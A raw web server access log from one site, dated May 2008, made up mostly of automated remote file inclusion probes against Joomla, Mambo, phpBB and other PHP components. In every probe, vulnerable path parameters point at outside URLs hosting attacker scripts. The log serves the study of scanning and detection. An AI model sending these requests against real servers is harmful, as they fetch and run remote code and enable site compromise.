63.246.128.120 - - [28/May/2008:11:21:40 -0700] "GET /logs/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.84.248.168 - - [28/May/2008:11:21:49 -0700] "GET /logs/access_071212.log//modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
190.84.248.168 - - [28/May/2008:11:21:56 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
190.84.248.168 - - [28/May/2008:11:22:03 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.246.128.120 - - [28/May/2008:11:22:09 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://internetforall.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.48.65.154 - - [28/May/2008:11:22:18 -0700] "GET /logs/access_071225.log/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://internetforall.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.95.45 - - [28/May/2008:11:22:19 -0700] "GET /logs/inc/cmses/mamboCMS.php?mambo_root_path=http://www.aula-verde.com.ar//media/cmd? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
72.29.95.45 - - [28/May/2008:11:22:19 -0700] "GET /inc/cmses/mamboCMS.php?mambo_root_path=http://www.aula-verde.com.ar//media/cmd? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
92.48.65.154 - - [28/May/2008:11:22:22 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://internetforall.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
92.48.65.154 - - [28/May/2008:11:22:22 -0700] "GET /logs/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://internetforall.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
190.84.248.168 - - [28/May/2008:11:22:26 -0700] "GET /logs/access_080102.log//modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.103.40 - - [28/May/2008:11:22:26 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
212.227.103.40 - - [28/May/2008:11:22:26 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
121.254.129.70 - - [28/May/2008:11:22:46 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://linknetcrew.com/source/robo.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
121.254.129.70 - - [28/May/2008:11:22:46 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://linknetcrew.com/source/robo.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:23:09 -0700] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/images.php?IMG_ROOT=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:11:23:15 -0700] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/images.php?IMG_ROOT=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.115.213.77 - - [28/May/2008:11:23:19 -0700] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.77 - - [28/May/2008:11:23:22 -0700] "GET /logs/access_071230.log//modules/vwar/admin/errors.php?error=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.77 - - [28/May/2008:11:23:26 -0700] "GET /logs/access_071230.log//modules/vwar/admin/errors.php?error=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.200.229.181 - - [28/May/2008:11:23:30 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:23:43 -0700] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/images.php?IMG_ROOT=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:23:43 -0700] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/images.php?IMG_ROOT=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:23:50 -0700] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/images.php?IMG_ROOT=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.247.36.34 - - [28/May/2008:11:24:07 -0700] "GET /logs/access_080401.log//ashnews.php?pathtoashnews=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.18.229 - - [28/May/2008:11:24:11 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.18.229 - - [28/May/2008:11:24:12 -0700] "GET /logs/access_070727.log HTTP/1.0" 200 35863 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
63.134.253.108 - - [28/May/2008:11:24:34 -0700] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.134.253.108 - - [28/May/2008:11:24:34 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.134.253.108 - - [28/May/2008:11:24:34 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:11:24:39 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.62.55.115 - - [28/May/2008:11:24:39 -0700] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.bestpaket.ru/netcat//dump/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:11:24:39 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:11:24:39 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
195.12.53.176 - - [28/May/2008:11:24:50 -0700] "GET /logs//index.php?option=com_wrapper&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
67.205.96.205 - - [28/May/2008:11:24:51 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.drcts.co.kr/rgboard/data/notice/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.205.96.205 - - [28/May/2008:11:24:51 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.drcts.co.kr/rgboard/data/notice/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
195.12.53.176 - - [28/May/2008:11:24:54 -0700] "GET //index.php?option=com_wrapper&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/inkamarsya/test.txt??? HTTP/1.1" 200 11606 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:11:25:06 -0700] "GET /logs/access_080103.log//components/com_htmlarea3_xtd-c/popups/ImageManager/images.php?IMG_ROOT=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:11:25:06 -0700] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/images.php?IMG_ROOT=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:11:25:06 -0700] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/images.php?IMG_ROOT=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.125.151.18 - - [28/May/2008:11:25:23 -0700] "GET /logs/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.tolivealie.com/store/media/a.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
75.125.151.18 - - [28/May/2008:11:25:23 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.tolivealie.com/store/media/a.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
67.205.96.205 - - [28/May/2008:11:25:42 -0700] "GET /logs/access_080115.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.drcts.co.kr/rgboard/data/notice/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
213.148.252.24 - - [28/May/2008:11:25:45 -0700] "GET /logs////////////////////////?includes/config-global.php?_SESSION[docroot_path]=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 200 49442 "-" "libwww-perl/5.79" "www.dmulk.com"
213.148.252.24 - - [28/May/2008:11:25:47 -0700] "GET ////////////////////////?includes/config-global.php?_SESSION[docroot_path]=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.26.122 - - [28/May/2008:11:25:50 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:11:25:53 -0700] "GET /logs/access_080221.log//agendax/addevent.inc.php?agendax_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:11:25:54 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:11:25:54 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:25:55 -0700] "GET /logs/access_080103.log//components/com_htmlarea3_xtd-c/popups/ImageManager/images.php?IMG_ROOT=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:25:55 -0700] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/images.php?IMG_ROOT=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:25:55 -0700] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/images.php?IMG_ROOT=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.86.26.122 - - [28/May/2008:11:25:56 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.26.122 - - [28/May/2008:11:25:56 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:26:21 -0700] "GET /logs/access_080103.log//components/com_htmlarea3_xtd-c/popups/ImageManager/images.php?IMG_ROOT=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:26:21 -0700] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/images.php?IMG_ROOT=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:26:21 -0700] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/images.php?IMG_ROOT=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:26:22 -0700] "GET /logs/access_080103.log//components/com_htmlarea3_xtd-c/popups/ImageManager/images.php?IMG_ROOT=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:26:22 -0700] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/images.php?IMG_ROOT=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:26:22 -0700] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/images.php?IMG_ROOT=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.116.45.210 - - [28/May/2008:11:26:30 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:26:33 -0700] "GET /logs/access_080103.log//components/com_htmlarea3_xtd-c/popups/ImageManager/images.php?IMG_ROOT=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:26:33 -0700] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/images.php?IMG_ROOT=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:26:33 -0700] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/images.php?IMG_ROOT=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.163.68.67 - - [28/May/2008:11:26:54 -0700] "GET / HTTP/1.1" 200 11602 "-" "-" "dmulk.com"
72.18.155.74 - - [28/May/2008:11:27:35 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:11:27:37 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 200 4139 "-" "libwww-perl/5.811" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:11:27:37 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:27:37 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:27:39 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 200 4139 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:27:39 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.115.213.77 - - [28/May/2008:11:27:42 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:11:27:48 -0700] "GET /logs/access_071224.log//components/com_htmlarea3_xtd-c/popups/ImageManager/images.php?IMG_ROOT=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.12.53.176 - - [28/May/2008:11:28:05 -0700] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/mahesaputra53/kiss.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [28/May/2008:11:28:06 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/mahesaputra53/kiss.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.190.24.146 - - [28/May/2008:11:28:17 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.190.24.146 - - [28/May/2008:11:28:18 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 200 4139 "-" "libwww-perl/5.811" "www.dmulk.com"
209.190.24.146 - - [28/May/2008:11:28:19 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:28:19 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:28:22 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 200 4139 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:28:22 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.96.205 - - [28/May/2008:11:28:34 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.drcts.co.kr/rgboard/data/notice/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
212.16.254.7 - - [28/May/2008:11:28:39 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.opns.be/images/stories/er.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
212.16.254.7 - - [28/May/2008:11:28:39 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.opns.be/images/stories/er.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
212.16.254.7 - - [28/May/2008:11:28:39 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.opns.be/images/stories/er.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:28:42 -0700] "GET /logs/access_071224.log//components/com_htmlarea3_xtd-c/popups/ImageManager/images.php?IMG_ROOT=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:11:28:58 -0700] "GET /logs/index.php?redir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:11:29:00 -0700] "GET /index.php?redir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.812" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:29:14 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:29:14 -0700] "GET /logs/access_071224.log//components/com_htmlarea3_xtd-c/popups/ImageManager/images.php?IMG_ROOT=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:29:16 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 200 4139 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:29:16 -0700] "GET /logs/access_071224.log//components/com_htmlarea3_xtd-c/popups/ImageManager/images.php?IMG_ROOT=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:29:16 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:29:17 -0700] "GET /logs/access_071224.log//components/com_htmlarea3_xtd-c/popups/ImageManager/images.php?IMG_ROOT=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.2.228.10 - - [28/May/2008:11:29:28 -0700] "GET //modules/Forums/admin/admin_styles.php?phpbb_root_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
195.2.228.10 - - [28/May/2008:11:29:28 -0700] "GET /logs//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:11:29:48 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:11:29:49 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 200 4139 "-" "libwww-perl/5.811" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:11:29:49 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.94.56.38 - - [28/May/2008:11:30:05 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gxczhb.gov.cn/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.94.56.38 - - [28/May/2008:11:30:05 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gxczhb.gov.cn/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:11:30:12 -0700] "GET /logs/access_080401.log//ashnews.php?pathtoashnews=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
